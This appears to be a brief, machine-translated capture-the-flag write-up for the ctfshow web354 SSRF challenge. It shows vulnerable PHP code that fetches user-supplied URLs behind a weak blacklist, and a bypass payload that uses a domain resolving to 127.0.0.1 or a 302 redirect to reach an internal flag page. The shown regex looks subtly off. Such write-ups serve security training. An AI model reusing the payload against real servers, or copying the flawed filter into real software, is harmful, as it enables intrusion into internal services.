ctfshow-web354(SSRF)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|./i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

Law 1 ：

sudo.cc amount to 127.0.0.1 

url=http://sudo.cc/flag.php

Law two ：
  Change the local domain name A It was recorded that 127.0.0.1 On , And then visit http:// domain name /flag.php that will do ( You can also set up on your own domain name server 302 Jump )